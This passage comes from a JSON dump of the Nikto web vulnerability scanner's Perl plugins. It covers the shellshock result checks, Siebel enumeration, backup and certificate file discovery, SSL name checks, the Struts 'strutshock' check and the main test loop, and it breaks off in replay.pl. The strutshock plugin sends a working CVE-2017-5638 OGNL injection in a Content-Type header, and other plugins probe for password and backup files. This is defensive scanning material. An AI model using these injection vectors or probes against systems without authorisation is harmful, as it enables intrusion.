\"$parameters->{'uri'}\", \"GET\", \"\", \\%headers, \"\", \"shellshock\");\n        if (($response->{'nikto-added-cve-2014-6271'} eq 'true') || ($checkcontent && ($content =~ /93e4r0-CVE-2014-6271: true/))) {\n            add_vulnerability( $mark, \"$parameters->{'uri'}: Site appears vulnerable to the 'shellshock' vulnerability (CVE-2014-6271).\", 999949, 112004, \"GET\",\n                \"$parameters->{'uri'}\", $request, $response);\n        }\n        if (($response->{'nikto-added-cve-2014-6278'} eq 'true') || ($checkcontent && ($content =~ /93e4r0-CVE-2014-6278: true/))) {\n            add_vulnerability( $mark, \"$parameters->{'uri'}: Site appears vulnerable to the 'shellshock' vulnerability (CVE-2014-6278).\", 999948, 112004, \"GET\",\n                \"$parameters->{'uri'}\", $request, $response);\n        }\n    }\n    else {\n        foreach my $cgidir (@dirs) {\n            foreach my $file (@files) {\n                return if $mark->{'terminate'};\n\n                # request by hostname\n                my ($res, $content, $error, $request, $response) = nfetch($mark, \"$cgidir$file\", \"GET\", \"\", \\%headers, \"\", \"shellshock\");\n                if (($response->{'nikto-added-cve-2014-6271'} eq 'true') || ($checkcontent && ($content =~ /93e4r0-CVE-2014-6271: true/))) {\n                    add_vulnerability( $mark, \"$cgidir$file: Site appears vulnerable to the 'shellshock' vulnerability (CVE-2014-6271).\", 999947, 112004, \"GET\",\n                        \"$cgidir$file\", $request, $response);\n                }\n                if (($response->{'nikto-added-cve-2014-6278'} eq 'true') || ($checkcontent && ($content =~ /93e4r0-CVE-2014-6278: true/))) {\n                    add_vulnerability( $mark, \"$cgidir$file: Site appears vulnerable to the 'shellshock' vulnerability (CVE-2014-6278).\", 999946, 112004, \"GET\",\n                        \"$cgidir$file\", $request, $response);\n                }\n            }\n        }\n    }\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_siebel.plugin",
    "content": "#VERSION,1.00\n###############################################################################\n#  Copyright (C) 2004 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to \n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# ASiebel specific checks\n###############################################################################\n\nsub nikto_siebel_init {\n    my $id = {\n            name        => \"siebel\",\n            full_name   => \"Siebel Checks\",\n            author      => \"Tautology\",\n            description => \"Performs a set of checks against an installed Siebel application\",\n            hooks       => {\n                              scan => {\n                                 method => \\&nikto_siebel,\n                              },\n                           },\n            copyright   => \"2011 Chris Sullo\",\n            options     => {\n                              enumerate    => \"Flag to indicate whether we shall attempt to enumerate known apps\",\n                              applications => \"List of applications\",\n                              languages    => \"List of Languages\",\n                              application  => \"Application to attack\",\n                           }\n              };\n    return $id;\n}\n\nsub nikto_siebel {\n    return if $mark->{'terminate'};\n    my ($mark, $parameters) = @_;\n    my $application;\n\n    # Check whether we have an application\n    if (defined $parameters->{'enumerate'}) {\n        my @apps=nikto_siebel_enumerate($mark, $parameters);\n        my $application=$apps[0];\n    }\n\n    if ($application eq \"\" && defined $parameters->{'application'}) {\n        $application=$parameters->{'application'};\n    }\n\n    if ($application eq \"\") {\n        nprint(\"No Siebel Application defined\",\"v\");\n        return;\n    }\n\n    # Now we have an application time to perform some tests\n    my $path = $application . \"/base.txt\";\n    my ($res, $content, $error, $request, $response) = nfetch($mark, $path, \"GET\", \"\", \"\", \"\", \"siebel: find default pages\");\n    if ($res eq \"200\") {\n        my ($siebelver, $appver, $hotfix);\n        $siebelver=$content;\n        $siebelver =~ s/([ \\t]*)([0-9.]*)( .*\\n.*)/$2/;\n        chomp($siebelver);\n        $appver = $content;\n        $appver =~ s/(.*\\[)(.*)(\\].*\\n.*)/$2/;\n        chomp($appver);\n        $hotfix = $content;\n        $hotfix =~ s/(.*\\n)(.*HOTFIX )(.*)/$3/;\n        add_vulnerability($mark, \"Siebel version $siebelver found, application version $appver, applied hostfixes are $hotfix\", 999901, 0, \"GET\", $path, $request, $response);\n    }\n\n    $path = $application . \"/_stats.swe\";\n    ($res, $content, $error, $request, $response) = nfetch($mark, $path, \"GET\", \"\", \"\", \"\", \"siebel: find default pages\");\n    if ($res eq \"200\") {\n        add_vulnerability($mark, \"Siebel stats page found at $path\", 999902, 0, \"GET\", $path, $request, $response);\n    }\n\n    foreach my $page (split(/ /, \"About_Siebel.htm files/ images/ help/ siebstarthelp.htm siebindex.htm\")) {\n        $path = $application . \"/$page\";\n        ($res, $content, $error, $request, $response) = nfetch($mark, $path, \"GET\", \"\", \"\", \"\", \"siebel: find default pages\");\n        if ($res eq \"200\") {\n            add_vulnerability($mark, \"Siebel default file $path found\", 999903, 0, \"GET\", $path, $request, $response);\n        }\n    }\n\n    return;\n}\n\nsub nikto_siebel_enumerate {\n    my ($mark, $params) = @_;\n\n    # Default apps and languages - allow parameters to over-ride them.\n    my $apps = \"emarketing ecustomer pmmanager sales marketing wpeserv salesce econsumerpharma emedia epublicsector eaf echannelcme epharmace siaservicece finseenenrollment ecustomercme loyalty erm etraining esales callcenter wpsales eai smc eprofessionalpharma eenergy pseservice sismarketing econsumer medicalce epharma fins finesales finscustomer htim loyaltyscw ermadmin eevents eauctionswexml cra wpserv eai_anon edealer esitesclinical eautomotive econsumersector echannelaf eEnergyOilGasChemicals cgce eclinical finsconsole finsebanking finssalespam htimpim eloyalty ememb pimportal eservice service wppm servicece edealerscw ecommunications ehospitality eretail echannelcg eCommunicationsWireless siasalesce emedical finsechannel finsebrokerage esalescme\";\n    my $langs = \"enu euq cht dan fin deu hun kor ptb sky sve pse cat shl nld fra ell ita nor ptg slv tha psl chs csy frc heb jpn plk rus esn trk\";\n\n    my @foundapps;\n\n    if ($params->{applications}) {\n        $apps=$params->{applications};\n    }\n\n    if ($params->{languages}) {\n        $langs=$params->{languages};\n    }\n\n    foreach my $language (split(/ /,$langs)) {\n        foreach my $application (split(/ /,$apps)) {\n            my $appname = $application . \"_\" . $language;\n            my $startname = $appname . \"/start.swe\";\n            ($res, $content, $error, $request, $response) = nfetch( $mark, $startname, \"GET\", \"\", \"\", \"\", \"siebel: enumerate application\");\n            if ($res eq \"200\") {\n                # We've found an app\n                add_vulnerability($mark, \"Enumerated Siebel application: \" . $appname, 999900, 0, \"GET\", $startname, $request, $response);\n                push(@foundapps, $appname);\n            }\n        }\n    }\n\n    return @foundapps;\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_sitefiles.plugin",
    "content": "#VERSION,2.00\n###############################################################################\n#  Copyright (C) 2013 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to\n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Look for interesting files based on site name/ip\n###############################################################################\nsub nikto_sitefiles_init {\n    my $id = { name        => \"sitefiles\",\n               full_name   => \"Site Files\",\n               author      => \"sullo\",\n               description => \"Look for interesting files based on the site's IP/name\",\n               hooks       => { scan => { method => \\&nikto_sitefiles, }, },\n               copyright   => \"2014 Chris Sullo\"\n               };\n\n    return $id;\n}\n\nsub nikto_sitefiles {\n    my ($mark) = @_;\n    my (%flags, %files, %names);\n\n    $names{ $mark->{'hostname'} } = 1;\n    $names{ $mark->{'vhost'} }    = 1;\n\n    foreach my $n (keys %names) {\n        my $nn = $n;\n        $nn =~ s/^www(?:\\d+)?\\.//;\n        $names{$nn} = 1;\n        $nn = $n;\n        $nn =~ s/\\./_/g;\n        $names{$nn} = 1;\n        my @bits = split(/\\./, $n);\n        my ($temp1, $temp2) = '';\n\n        for (my $i = 0 ; $i <= $#bits ; $i++) {\n            $names{ $bits[$i] } = 1;\n            $temp1 .= $bits[$i];\n            $temp2 .= '.' . $bits[$i];\n            $temp2 =~ s/^\\.//;\n            $names{$temp1} = 1;\n            $names{$temp2} = 1;\n        }\n    }\n    $names{'backup'}        = 1;\n    $names{'site'}          = 1;\n    $names{'archive'}       = 1;\n    $names{'database'}      = 1;\n    $names{'dump'}          = 1;\n    $names{ $mark->{'ip'} } = 1;\n\n    foreach my $item (keys %names) {\n        next if $item eq '';\n        foreach my $ext (qw/jks cer pem zip tar tar.gz gz tgz tar.bz2 tar.lzma alz egg war sql/) {\n            $files{\"$item\\.$ext\"} = 1;\n        }\n    }\n\n    foreach my $f (keys %files) {\n        # trickery to test with both host header and without\n        foreach my $flag (0 .. 1) {\n            return if $mark->{'terminate'};\n            my $msg = \"\";\n            $flags{'nohost'} = $flag;\n            if ($flag) {\n                $msg = \"(NOTE: requested by IP address).\";\n            }\n\n            # request. flags passed will determine if hostname is used or not\n            my ($res, $content, $error, $request, $response) =\n              nfetch($mark, \"/$f\", \"GET\", \"\", \"\", \\%flags, \"sitefiles\");\n\n            if (($response->{'content-type'} =~ '/^application\\//i')\n                || (   ($res == 200)\n                    && ($response->{'content-length'} > 0)\n                    && (!is_404(\"/$f\", $content, $res, $response->{'location'})))\n                    ) {\n\n                # alert\n                add_vulnerability($mark,\n                                  \"/$f: Potentially interesting backup/cert file found. $msg\",\n                                  740001, 0, \"HEAD\", \"/$f\", $request, $response);\n                last;\n            }\n        }\n\n    }\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_ssl.plugin",
    "content": "#VERSION,2.01\n###############################################################################\n#  Copyright (C) 2010 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to \n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Test certificate information\n###############################################################################\nsub nikto_ssl_init {\n    my $id = { name        => \"ssl\",\n               full_name   => \"SSL and cert checks\",\n               author      => \"Sullo\",\n               description => \"Perform checks on SSL/Certificates\",\n               hooks       => { scan => { method => \\&nikto_ssl, } },\n               copyright   => \"2010 Chris Sullo\"\n               };\n    return $id;\n}\n\nsub nikto_ssl {\n    my ($mark) = @_;\n\n    if ($mark->{ssl}) {\n    \tmy @names;\n\tmy $match=0;\n        $mark->{'ssl_cert_subject'} =~ /CN=([^$ \\/]+)/;\n\tpush(@names, $1);\n\tif ($mark->{'ssl_cert_altnames'} ne '') {\n\t\tforeach my $n (split(/, /,$mark->{'ssl_cert_altnames'})) {\n\t\t\tpush(@names, $n);\n\t\t\t}\n\t\t}\n\t@names = unique_vals(@names);\n\tmy $allnames = join(\", \", @names);\n\n\tforeach my $cert_name (@names) {\n\t\t# straight up match\n\t\tif (lc($mark->{'hostname'}) eq lc($cert_name)) { $match = 1; }\n\n\t\t# wildcard cert\n\t\telsif ($cert_name =~ /^\\*/) {\n\t\t\tadd_vulnerability($mark, \"Server is using a wildcard certificate: $cert_name\", 999992, 0);\n\t\t\t$cert_name =~ s/^\\*\\.//;\n\t\t\t$cert_name = rquote($cert_name);\n\n\t\t\t# must match leading dot\n\t\t\t# only one level of subdomain allowed\n\t\t\tif ($mark->{'hostname'} =~ /^(.*)\\.?$cert_name/i) {\n\t\t\t\tmy $matched = $1;\n\t\t\t\tmy $tldcount = ($matched =~ tr/\\.//);\n\t\t\t\tif ($tldcount <= 1) { $match = 1; }\n\t\t\t\t}\n\t\t\t}\n\t\tlast if $match;\n\t\t}\n\n\t\tif (!$match) {\n\t\t\tadd_vulnerability($mark, \"Hostname '$mark->{'hostname'}' does not match certificate's names: $allnames\", 999993, 0);\n\t\t\t}\n    }\n}\n\nsub unique_vals {\n    my %seen;\n    grep !$seen{$_}++, @_;\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_strutshock.plugin",
    "content": "#VERSION,2.01\n###############################################################################\n#  Copyright (C) 2017 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to\n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Check for the Apache Struts2 RCE 'strutshock' vulnerability\n###############################################################################\nsub nikto_strutshock_init {\n    my $id = { name        => \"strutshock\",\n               full_name   => \"strutshock\",\n               author      => \"Jeremy Bae\",\n               description => \"Look for the 'strutshock' vulnerability.\",\n               hooks       => { scan => { method => \\&nikto_strutshock, weight => 20 }, },\n               copyright   => \"2017 Chris Sullo\",\n             };\n\n    return $id;\n}\n\nsub nikto_strutshock {\n    my ($mark, $parameters) = @_;\n\n    my %headers;\n    $headers{'Content-Type'} = '%{#context[\\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\\'].addHeader(\\'Nikto-Added-CVE-2017-5638\\',7*6)}.multipart/form-data';\n\n    for my $path (split(/ /, $VARIABLES{\"\\@STRUTSACTIONS\"})) {\n        my ($res, $content, $error, $request, $response) = nfetch($mark, $path, \"GET\", \"\", \\%headers, \"\", \"strutshock\");\n        if ($response->{'nikto-added-cve-2017-5638'} eq '42') {\n            add_vulnerability($mark, \"$path: Site appears vulnerable to the 'strutshock' vulnerability (CVE-2017-5638).\", 999950, 0, \"GET\", $path, $request, $response);\n        }\n    }\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_tests.plugin",
    "content": "#VERSION,2.04\n###############################################################################\n#  Copyright (C) 2007 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to\n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Perform the full database of nikto tests against a target\n###############################################################################\nsub nikto_tests_init {\n    my $id = { name        => \"tests\",\n               full_name   => \"Nikto Tests\",\n               author      => \"Sullo, Tautology\",\n               description => \"Test host with the standard Nikto tests\",\n               copyright   => \"2008 Chris Sullo\",\n               hooks       => {\n                          scan => { method => \\&nikto_tests,\n                                    weight => 99,\n                                    },\n                            },\n               options => {\n                         passfiles => \"Flag to indicate whether to check for common password files\",\n                         all => \"Flag to indicate whether to check all files with all directories\",\n                         report => \"Report a status after the passed number of tests\",\n                         tids => \"A range of testids that will only be run\",\n                         }\n                 };\n    return $id;\n}\n\nsub nikto_tests {\n    return if $mark->{'terminate'};\n    my ($mark, $parameters) = @_;\n    my @tids;\n\n    if (defined $parameters->{'tids'}) {\n        @tids = expand_range($parameters->{'tids'});\n    }\n\n    # this is the actual the looped code for all the checks\n    foreach my $checkid (sort keys %TESTS) {\n        return if $mark->{'terminate'};\n        if ($checkid >= 500000) { next; }    # skip TESTS added manually during run (for reports)\n                                             # replace variables in the uri\n\tmy $intcheck=int($checkid);\n\tif ((scalar(@tids) > 0) && !grep(/^$intcheck$/, @tids)) { next; }\n        my @urilist = change_variables($TESTS{$checkid}{'uri'});\n\n        # Now repeat for each uri\n\tURI: foreach my $uri (@urilist) {\n            return if $mark->{'terminate'};\n            my (%headrs, %flags, $data);\n\n            if ($TESTS{$checkid}{'headers'} ne '') {\n            \tmy $header = unslash($TESTS{$checkid}{'headers'});\n                foreach my $h (split /\\r\\n/, $header) {\n                    my ($key, $value) = split(/: /, $h);\n                    lc($key);\n                    $headrs{$key} = $value;\n                }\n                $headrs{'host'} = $mark->{'hostname'} unless ($headrs{'host'}); # Kludge not to override host injection vectors\n                $flags{'noclean'} = 1;\n            }\n            if ($TESTS{$checkid}{'data'} ne '') {\n            \t$data = unslash($TESTS{$checkid}{'data'});\n                $headrs{'content-length'} = length($data) unless grep(/^transfer-encoding$/i, keys %headrs);\n            }\n            my ($res, $content, $error, $request, $response) =\n              nfetch($mark, $uri,\n                     $TESTS{$checkid}{'method'},\n                     $data,\n                     \\%headrs,\n                     \\%flags,\n                     $checkid);\n\n            # NOTE: auth is now done in nfetch\n            if ($OUTPUT{'show_ok'} && ($res eq 200)) {\n                nprint(\"+ $mark->{'root'}$uri - 200/OK Response could be $TESTS{$checkid}{'message'}\");\n            }\n            elsif ($OUTPUT{'show_redirects'} && ($res =~ /30(?:[0-3]|7)/)) {\n                nprint(  \"+ $mark->{'root'}$uri - Redirects ($res) to \"\n                       . $response->{'location'} . \" , \" . $TESTS{$checkid}{'message'});\n            }\n\n            # If user puts a @CODE= string in db_404_strings, let it take precedence\n            foreach my $code (keys %{ $VARIABLES->{'ERRCODES'} }) {\n                if ($res =~ /$code/) {\n                    next URI;\n                }\n            }\n\n            my $m1_method = my $m1o_method = my $m1a_method = my $f2_method = my $f1_method = \"content\";\n            my $positive = my $hashme = 0;\n            my $hash = $reason = '';\n\n            # how to check each conditional\n            if ($TESTS{$checkid}{'match_1'} =~ /^[0-9]{3}$/) { $m1_method = \"code\"; }\n            elsif ($TESTS{$checkid}{'match_1'} =~ /^\\@MD5/) {\n                $m1_method = \"md5\";\n                $hashme    = 1;\n                $TESTS{$checkid}{'match_1'} =~ s/^\\@MD5//;\n            }\n\n            if ($TESTS{$checkid}{'match_1_or'} =~ /^[0-9]{3}$/) { $m1o_method = \"code\"; }\n            elsif ($TESTS{$checkid}{'match_1_or'} =~ /^\\@MD5/) {\n                $m1o_method = \"md5\";\n                $hashme     = 1;\n                $TESTS{$checkid}{'match_1_or'} =~ s/^\\@MD5//;\n            }\n\n            if ($TESTS{$checkid}{'match_1_and'} =~ /^[0-9]{3}$/) { $m1a_method = \"code\"; }\n            elsif ($TESTS{$checkid}{'match_1_and'} =~ /^\\@MD5/) {\n                $m1a_method = \"md5\";\n                $hashme     = 1;\n                $TESTS{$checkid}{'match_1_and'} =~ s/^\\@MD5//;\n            }\n\n            if ($TESTS{$checkid}{'fail_1'} =~ /^[0-9]{3}$/) { $f1_method = \"code\"; }\n            elsif ($TESTS{$checkid}{'fail_1'} =~ /^\\@MD5/) {\n                $f1_method = \"md5\";\n                $hashme    = 1;\n                $TESTS{$checkid}{'fail_1'} =~ s/^\\@MD5//;\n            }\n\n            if ($TESTS{$checkid}{'fail_2'} =~ /^[0-9]{3}$/) { $f2_method = \"code\"; }\n            elsif ($TESTS{$checkid}{'fail_2'} =~ /^\\@MD5/) {\n                $f2_method = \"md5\";\n                $hashme    = 1;\n                $TESTS{$checkid}{'fail_2'} =~ s/^\\@MD5//;\n            }\n\n            if ($hashme) {\n                $hash = LW2::md5($content);\n            }\n\n            # basic match for positive response\n            if ($m1_method eq \"content\") {\n                if ($content =~ /$TESTS{$checkid}{'match_1'}/) {\n                    $positive = 1;\n                    $reason = 'Content Match';\n                }\n            }\n            elsif ($m1_method eq \"md5\") {\n                if ($hash eq $TESTS{$checkid}{'match_1'}) {\n                    $positive = 1;\n                    $reason = 'MD5 Hash';\n                }\n            }\n            else {\n                if ($res eq $TESTS{$checkid}{'match_1'}) {\n                    $positive = 1;\n                    $reason = 'Response Code Match';\n                }\n                elsif ($res eq $FoF{'okay'}{'response'}) {\n                    $positive = 1;\n                    $reason = 'Response Code Match - FoF OK Response)';\n                }\n            }\n\n            # no match, check optional match\n            if ((!$positive) && ($TESTS{$checkid}{'match_1_or'} ne \"\")) {\n                if ($m1o_method eq \"content\") {\n                    if ($content =~ /$TESTS{$checkid}{'match_1_or'}/) {\n                        $positive = 1;\n                    \t$reason = 'Content Match - Match 1 (Or)';\n                    }\n                }\n                elsif ($m1o_method eq \"md5\") {\n                    if ($hash eq $TESTS{$checkid}{'match_1_or'}) {\n                        $positive = 1;\n                    \t$reason = 'MD5 Hash - Match 1 (Or)';\n                    }\n                }\n                else {\n                    if ($res eq $TESTS{$checkid}{'match_1_or'}) {\n                        $positive = 1;\n                        $reason = 'Response Code Match - Match 1 (Or)';\n                    }\n                    elsif ($res eq $FoF{'okay'}{'response'}) {\n                        $positive = 1;\n                        $reason = 'Response Code Match - FoF OK Response / Match 1 (Or)';\n                    }\n                }\n            }\n\n            # matched on something, check fails/ands\n            if ($positive) {\n                if ($TESTS{$checkid}{'fail_1'} ne \"\") {\n                    if ($f1_method eq \"content\") {\n                        if ($content =~ /$TESTS{$checkid}{'fail_1'}/) { next; }\n                    }\n                    elsif ($f1_method eq \"md5\") {\n                        if ($hash eq $TESTS{$checkid}{'fail_1'}) {\n                            next;\n                        }\n                    }\n                    else {\n                        if ($res eq $TESTS{$checkid}{'fail_1'}) { next; }\n                    }\n                }\n                if ($TESTS{$checkid}{'fail_2'} ne \"\") {\n                    if ($f2_method eq \"content\") {\n                        if ($content =~ /$TESTS{$checkid}{'fail_2'}/) { next; }\n                    }\n                    elsif ($f2_method eq \"md5\") {\n                        if ($hash eq $TESTS{$checkid}{'fail_2'}) {\n                            next;\n                        }\n                    }\n                    else {\n                        if ($res eq $TESTS{$checkid}{'fail_2'}) { next; }\n                    }\n                }\n                if ($TESTS{$checkid}{'match_1_and'} ne \"\") {\n                    if ($m1a_method eq \"content\") {\n                        if ($content !~ /$TESTS{$checkid}{'match_1_and'}/) { next; }\n                        else { $reason .= ' and content Match1 (And)'; }\n                    }\n                    elsif ($m1a_method eq \"md5\") {\n                        if ($hash ne $TESTS{$checkid}{'match_1_and'}) { next; }\n                        else { $reason .= ' and MD5 Match1 (And)'; }\n                    }\n                    else {\n                        if ($res ne $TESTS{$checkid}{'match_1_and'}) { next; }\n                        else { $reason .= ' and Response Code Match1 (And)'; }\n                    }\n                }\n\n                # if it's an index.php, check for normal /index.php to see if it's a FP\n                if ($uri =~ /^\\/index.php\\?/) {\n                    my $content = rm_active_content($content, $mark->{'root'} . $uri);\n                    if (LW2::md4($content) eq $FoF{'index.php'}{'match'}) { next; }\n                }\n\n                # lastly check for a false positive based on file extension or type\n                if (($m1_method eq \"code\") || ($m1o_method eq \"code\")) {\n                    if (is_404($mark->{'root'} . $uri, $content, $res, $response->{'location'}))\n                    {\n                        next;\n                    }\n                }\n\n                $TESTS{$checkid}{'osvdb'} =~ s/\\s+/ OSVDB\\-/g;\n                if ($positive) {\n                    add_vulnerability($mark,\n                                  \"$mark->{'root'}$uri: $TESTS{$checkid}{'message'}\",\n                                  $checkid,\n                                  $TESTS{$checkid}{'osvdb'},\n                                  $TESTS{$checkid}{'method'},\n                                  $mark->{'root'} . $uri,\n                                  $request,\n                                  $response,\n                                  $reason\n                                  );\n                }\n            }\n        }\n\n        # Percentages\n        if (($OUTPUT{'progress'}) && ($parameters->{'report'})) {\n            if (($COUNTERS{'totalrequests'} % $parameters->{'report'}) == 0) {\n                status_report();\n            }\n        }\n    }    # end check loop\n\n    # Perform mutation tests\n    if ($parameters->{'passfiles'}) {\n        passchecks($mark);\n    }\n    if ($parameters->{'all'}) {\n        allchecks($mark);\n    }\n\n    return;\n}\n\nsub passchecks {\n    my ($mark) = @_;\n    my @DIRS   = (split(/ /, $VARIABLES{\"\\@PASSWORDDIRS\"}));\n    my @PFILES = (split(/ /, $VARIABLES{\"\\@PASSWORDFILES\"}));\n    my @EXTS = qw(asp bak dat data dbc dbf exe htm html htx ini lst txt xml php php3);\n\n    nprint(\"- Performing passfiles mutation\", \"v\");\n\n    # Update total requests for status reports\n    my @CGIS = split(/ /, $VARIABLES{'@CGIDIRS'});\n    $COUNTERS{'total_checks'} =\n      $COUNTERS{'total_checks'} +\n      (scalar(@DIRS) * scalar(@PFILES)) +\n      (scalar(@DIRS) * scalar(@PFILES) * scalar(@EXTS)) +\n      ((scalar(@DIRS) * scalar(@PFILES) * scalar(@EXTS) * scalar(@CGIS)) * 2);\n\n    foreach my $dir (@DIRS) {\n        return if $mark->{'terminate'};\n        foreach my $file (@PFILES) {\n            next if ($file eq \"\");\n\n            # dir/file\n            testfile($mark, \"$dir$file\", \"passfiles\", \"299998\");\n\n            foreach my $ext (@EXTS) {\n                return if $mark->{'terminate'};\n\n                # dir/file.ext\n                testfile($mark, \"$dir$file.$ext\", \"passfiles\", \"299998\");\n\n                foreach my $cgi (@CGIS) {\n                    $cgi =~ s/\\/$//;\n\n                    # dir/file.ext\n                    testfile($mark, \"$cgi$dir$file.$ext\", \"passfiles\", \"299998\");\n\n                    # dir/file\n                    testfile($mark, \"$cgi$dir$file\", \"passfiles\", \"299998\");\n                }\n            }\n        }\n    }\n}\n\nsub allchecks {\n    my ($mark) = @_;\n\n    # Hashes to temporarily store files/dirs in\n    # We're using hashes to ensure that duplicates are removed\n    my (%FILES, %DIRS);\n\n    # build the arrays\n    nprint(\"- Loading root level files\", \"v\");\n    foreach my $checkid (keys %TESTS) {\n\n        # Expand out vars so we get full matches\n        my @uris = change_variables($TESTS{$checkid}{'uri'});\n\n        foreach my $uri (@uris) {\n            my $dir  = LW2::uri_get_dir($uri);\n            my $file = $uri;\n\n            if ($dir ne \"\") {\n                $DIRS{$dir} = \"\";\n                $dir  =~ s/([^a-zA-Z0-9])/\\\\$1/g;\n                $file =~ s/$dir//;\n            }\n            if (($file ne \"\") && ($file !~ /^\\?/)) {\n                $FILES{$file} = \"\";\n            }\n        }\n    }\n\n    # Update total requests for status reports\n    $COUNTERS{'total_checks'} = $COUNTERS{'total_checks'} + (keys(%DIRS) * keys(%FILES));\n\n    # Now do a check for each item - just check the return status, nothing else\n    foreach my $dir (keys %DIRS) {\n        foreach my $file (keys %FILES) {\n            return if $mark->{'terminate'};\n            testfile($mark, \"$dir$file\", \"all checks\", 299999);\n        }\n    }\n}\n\nsub testfile {\n    return if $mark->{'terminate'};\n    my ($mark, $uri, $name, $tid) = @_;\n    my ($res, $content, $error, $request, $response) =\n      nfetch($mark, $uri, \"GET\", \"\", \"\", \"\", \"Tests: $name\");\n    nprint(\"- $res for $uri (error: $error)\", \"v\");\n    if ($error) {\n        $mark->{'total_errors'}++;\n        nprint(\"+ ERROR: $uri returned an error: $error\", \"e\");\n        return;\n    }\n    if ($res == 200) {\n        add_vulnerability($mark, \"$uri: file found during $name mutation\", \"$tid\", \"0\", \"GET\", $uri, $request, $response);\n    }\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/replay.pl",
    "content": "#!/usr/bin/perl\n#VERSION,1.00\n###############################################################################\n#  Copyright (C) 20l2 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to the Free Software\n#  Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.\n###############################################################################\n# PURPOSE:\n# Replay a saved request\n###############################################################################\nuse Getopt::Long;\nuse JSON::PP;\nrequire 'plugins/LW2.pm';\nmy ($infile, $proxy, %request, $header, %result, $s_request);\nLW2::http_init_request(\\%request);\n\n# options\nGetOptions(\"help\"    => \\&usage,\n           \"file=s\"  => \\$infile,\n           \"proxy=s\" => \\$proxy\n           );\n\nif (($infile eq '') && (-r $ARGV[0])) {\n    $infile = $ARGV[0];\n}\n\nif ($infile eq '') { usage(); }\n\n# load save file\nif (!-r $infile) {\n    print \"ERROR: Argument 1 should be '-help' or a Nikto save file\\n\\n\";\n    exit 1;\n}\n\nopen(INFILE, \"<$infile\") || die print \"Unable to open file: $!\\n\\n\";\nwhile (<INFILE>) {\n    if ($_ =~ /^(((Test|OSVDB) ID)|Message):/) { $header .= $_; next; }\n    next unless $_ =~ /^REQUEST:/;\n    chomp;\n    $_ =~ s/^REQUEST://;\n    $s_request = JSON::PP->new->utf8(1)->allow_nonref(1)->decode($_);\n    if (ref($s_request) ne 'HASH') {\n        print \"ERROR: Unable to read JSON into request structure\\n\";\n        exit 1;\n    }\n}\nclose(INFILE);\n\n# set into request hash\nforeach my $key (keys %{$s_request}) {\n    $request{$key} = $s_request->{$key};\n}\n\n# proxy\nif ($proxy ne '') {\n    my @p = split(/:/, $proxy);\n    if (($p[0] eq '') || ($p[1] eq '') || ($p[1] =~ /[^\\d]/)) {\n        print \"ERROR: Invalid proxy designation\\n\";\n        exit 1;\n    }\n    $request{'whisker'}->{'proxy_host'} = $p[0];\n    $request{'whisker'}->{'proxy_port'} = $p[1];\n}\n\n# output for the user\nprint \"-\" x 44, \"  Info\\n\";\nprint \"Request to:     http\";\nprint \"s\" if 